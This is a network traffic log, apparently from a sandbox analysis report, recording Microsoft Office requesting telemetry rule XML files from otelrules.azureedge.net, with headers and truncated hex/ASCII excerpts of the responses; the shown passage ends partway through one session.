                2024-10-07 01:26:57 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                78192.168.2.44982813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:57 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:57 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:57 GMT
                Content-Type: text/xml
                Content-Length: 1952
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                ETag: "0x8DC582B956B0F3D"
                x-ms-request-id: a5ff6bd9-301e-005d-3af2-16e448000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012657Z-1657d5bbd48vhs7r2p1ky7cs5w000000033000000000de06
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:57 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                Session IDSource IPSource PortDestination IPDestination Port
                79192.168.2.44982613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:57 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:57 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:57 GMT
                Content-Type: text/xml
                Content-Length: 468
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                ETag: "0x8DC582BBA642BF4"
                x-ms-request-id: f5ee0945-901e-0083-4202-17bb55000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012657Z-1657d5bbd482tlqpvyz9e93p5400000002sg00000000t2tf
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:57 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                80192.168.2.44982713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:57 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:57 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:57 GMT
                Content-Type: text/xml
                Content-Length: 174
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                ETag: "0x8DC582B91D80E15"
                x-ms-request-id: 0607cd43-401e-0078-1b00-174d34000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012657Z-1657d5bbd48sqtlf1huhzuwq7000000002hg00000000aexv
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:57 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                Session IDSource IPSource PortDestination IPDestination Port
                81192.168.2.44982513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:57 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:57 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:57 GMT
                Content-Type: text/xml
                Content-Length: 405
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                ETag: "0x8DC582B942B6AFF"
                x-ms-request-id: dfb96d6a-f01e-003f-17e5-16d19d000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012657Z-1657d5bbd48q6t9vvmrkd293mg00000002q000000000pdn6
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:57 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                Session IDSource IPSource PortDestination IPDestination Port
                82192.168.2.44982913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:58 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:58 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:58 GMT
                Content-Type: text/xml
                Content-Length: 958
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                ETag: "0x8DC582BA0A31B3B"
                x-ms-request-id: 0c165d1d-a01e-000d-7dfe-16d1ea000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012658Z-1657d5bbd48xdq5dkwwugdpzr0000000035g000000005t6m
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:58 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                Session IDSource IPSource PortDestination IPDestination Port
                83192.168.2.44983013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:58 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:58 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:58 GMT
                Content-Type: text/xml
                Content-Length: 501
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                ETag: "0x8DC582BACFDAACD"
                x-ms-request-id: c2f609cb-201e-0003-75fd-16f85a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012658Z-1657d5bbd48xdq5dkwwugdpzr0000000031000000000s46y
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:58 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                Session IDSource IPSource PortDestination IPDestination Port
                84192.168.2.44983313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:58 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:58 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:58 GMT
                Content-Type: text/xml
                Content-Length: 2284
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                ETag: "0x8DC582BCD58BEEE"
                x-ms-request-id: b738acd5-401e-0067-1502-1709c2000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012658Z-1657d5bbd48jwrqbupe3ktsx9w00000003300000000019yd
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:58 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                Session IDSource IPSource PortDestination IPDestination Port
                85192.168.2.44983113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:58 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:58 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:58 GMT
                Content-Type: text/xml
                Content-Length: 2592
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                ETag: "0x8DC582BB5B890DB"
                x-ms-request-id: 33b4d0ae-a01e-0032-35ff-161949000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012658Z-1657d5bbd48t66tjar5xuq22r800000002v0000000003pqv
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:58 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                Session IDSource IPSource PortDestination IPDestination Port
                86192.168.2.44983213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:58 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:58 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:58 GMT
                Content-Type: text/xml
                Content-Length: 3342
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                ETag: "0x8DC582B927E47E9"
                x-ms-request-id: 960edd56-701e-005c-4100-17bb94000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012658Z-1657d5bbd48lknvp09v995n79000000002e000000000bnbm
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:58 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                Session IDSource IPSource PortDestination IPDestination Port
                87192.168.2.44983413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:58 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:58 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:58 GMT
                Content-Type: text/xml
                Content-Length: 1393
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                ETag: "0x8DC582BE3E55B6E"
                x-ms-request-id: 8a5fd43d-c01e-0066-4506-17a1ec000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012658Z-1657d5bbd482tlqpvyz9e93p5400000002vg00000000dmvy
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:58 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                Session IDSource IPSource PortDestination IPDestination Port
                88192.168.2.44983613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:59 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
                Content-Type: text/xml
                Content-Length: 1393
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                ETag: "0x8DC582BE39DFC9B"
                x-ms-request-id: b72ef555-401e-0067-78fe-1609c2000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012659Z-1657d5bbd48lknvp09v995n79000000002b000000000qwww
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:59 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                Session IDSource IPSource PortDestination IPDestination Port
                89192.168.2.44983513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:59 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:59 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:59 GMT
